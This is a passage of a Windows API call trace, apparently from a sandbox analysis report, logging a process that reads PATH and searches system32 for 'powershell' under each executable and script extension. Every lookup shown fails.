	[0809.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1f3c80, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0809.305] CoTaskMemFree (pv=0x1f3c80) 
	[0809.305] CoTaskMemAlloc (cb=0x128) returned 0x2857440
	[0809.305] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2857440, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0809.305] CoTaskMemFree (pv=0x2857440) 
	[0809.309] CoTaskMemAlloc (cb=0x20e) returned 0x285f5e0
	[0809.309] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x285f5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0809.309] CoTaskMemFree (pv=0x285f5e0) 
	[0809.313] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0809.314] SetErrorMode (uMode=0x1) returned 0x1
	[0809.317] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.275] SetErrorMode (uMode=0x1) returned 0x1
	[0810.277] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.277] SetErrorMode (uMode=0x1) returned 0x1
	[0810.277] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.286] SetErrorMode (uMode=0x1) returned 0x1
	[0810.287] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.288] SetErrorMode (uMode=0x1) returned 0x1
	[0810.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.296] SetErrorMode (uMode=0x1) returned 0x1
	[0810.298] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.298] SetErrorMode (uMode=0x1) returned 0x1
	[0810.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0810.306] SetErrorMode (uMode=0x1) returned 0x1
	[0810.308] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0810.308] SetErrorMode (uMode=0x1) returned 0x1
	[0810.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.274] SetErrorMode (uMode=0x1) returned 0x1
	[0811.276] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.276] SetErrorMode (uMode=0x1) returned 0x1
	[0811.276] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.285] SetErrorMode (uMode=0x1) returned 0x1
	[0811.286] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.287] SetErrorMode (uMode=0x1) returned 0x1
	[0811.287] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.298] SetErrorMode (uMode=0x1) returned 0x1
	[0811.300] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.300] SetErrorMode (uMode=0x1) returned 0x1
	[0811.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0811.309] SetErrorMode (uMode=0x1) returned 0x1
	[0811.311] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0811.311] SetErrorMode (uMode=0x1) returned 0x1
	[0811.311] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.386] SetErrorMode (uMode=0x1) returned 0x1
	[0812.388] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.388] SetErrorMode (uMode=0x1) returned 0x1
	[0812.388] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.396] SetErrorMode (uMode=0x1) returned 0x1
	[0812.398] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.398] SetErrorMode (uMode=0x1) returned 0x1
	[0812.398] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.406] SetErrorMode (uMode=0x1) returned 0x1
	[0812.408] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.408] SetErrorMode (uMode=0x1) returned 0x1
	[0812.408] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0812.416] SetErrorMode (uMode=0x1) returned 0x1
	[0812.417] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0812.418] SetErrorMode (uMode=0x1) returned 0x1
	[0812.418] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.849] SetErrorMode (uMode=0x1) returned 0x1
	[0813.850] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.850] SetErrorMode (uMode=0x1) returned 0x1
	[0813.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.859] SetErrorMode (uMode=0x1) returned 0x1
	[0813.861] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.861] SetErrorMode (uMode=0x1) returned 0x1
	[0813.861] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.872] SetErrorMode (uMode=0x1) returned 0x1
	[0813.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.874] SetErrorMode (uMode=0x1) returned 0x1
	[0813.874] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.874] SetErrorMode (uMode=0x1) returned 0x1
	[0813.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.875] SetErrorMode (uMode=0x1) returned 0x1
	[0813.875] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.875] SetErrorMode (uMode=0x1) returned 0x1
	[0813.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.876] SetErrorMode (uMode=0x1) returned 0x1
	[0813.876] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.876] SetErrorMode (uMode=0x1) returned 0x1
	[0813.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.876] SetErrorMode (uMode=0x1) returned 0x1
	[0813.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.877] SetErrorMode (uMode=0x1) returned 0x1
	[0813.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.877] SetErrorMode (uMode=0x1) returned 0x1
	[0813.877] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.878] SetErrorMode (uMode=0x1) returned 0x1
	[0813.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.878] SetErrorMode (uMode=0x1) returned 0x1
	[0813.878] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.878] SetErrorMode (uMode=0x1) returned 0x1
	[0813.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.879] SetErrorMode (uMode=0x1) returned 0x1
	[0813.879] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.879] SetErrorMode (uMode=0x1) returned 0x1
	[0813.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.879] SetErrorMode (uMode=0x1) returned 0x1
	[0813.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.880] SetErrorMode (uMode=0x1) returned 0x1
	[0813.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.880] SetErrorMode (uMode=0x1) returned 0x1
	[0813.880] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.880] SetErrorMode (uMode=0x1) returned 0x1
	[0813.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.881] SetErrorMode (uMode=0x1) returned 0x1
	[0813.881] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.881] SetErrorMode (uMode=0x1) returned 0x1
	[0813.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.882] SetErrorMode (uMode=0x1) returned 0x1
	[0813.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.882] SetErrorMode (uMode=0x1) returned 0x1
	[0813.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c6bdc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0813.882] SetErrorMode (uMode=0x1) returned 0x1
	[0813.882] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c6bdde0 | out: lpFindFileData=0x1c6bdde0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.883] SetErrorMode (uMode=0x1) returned 0x1
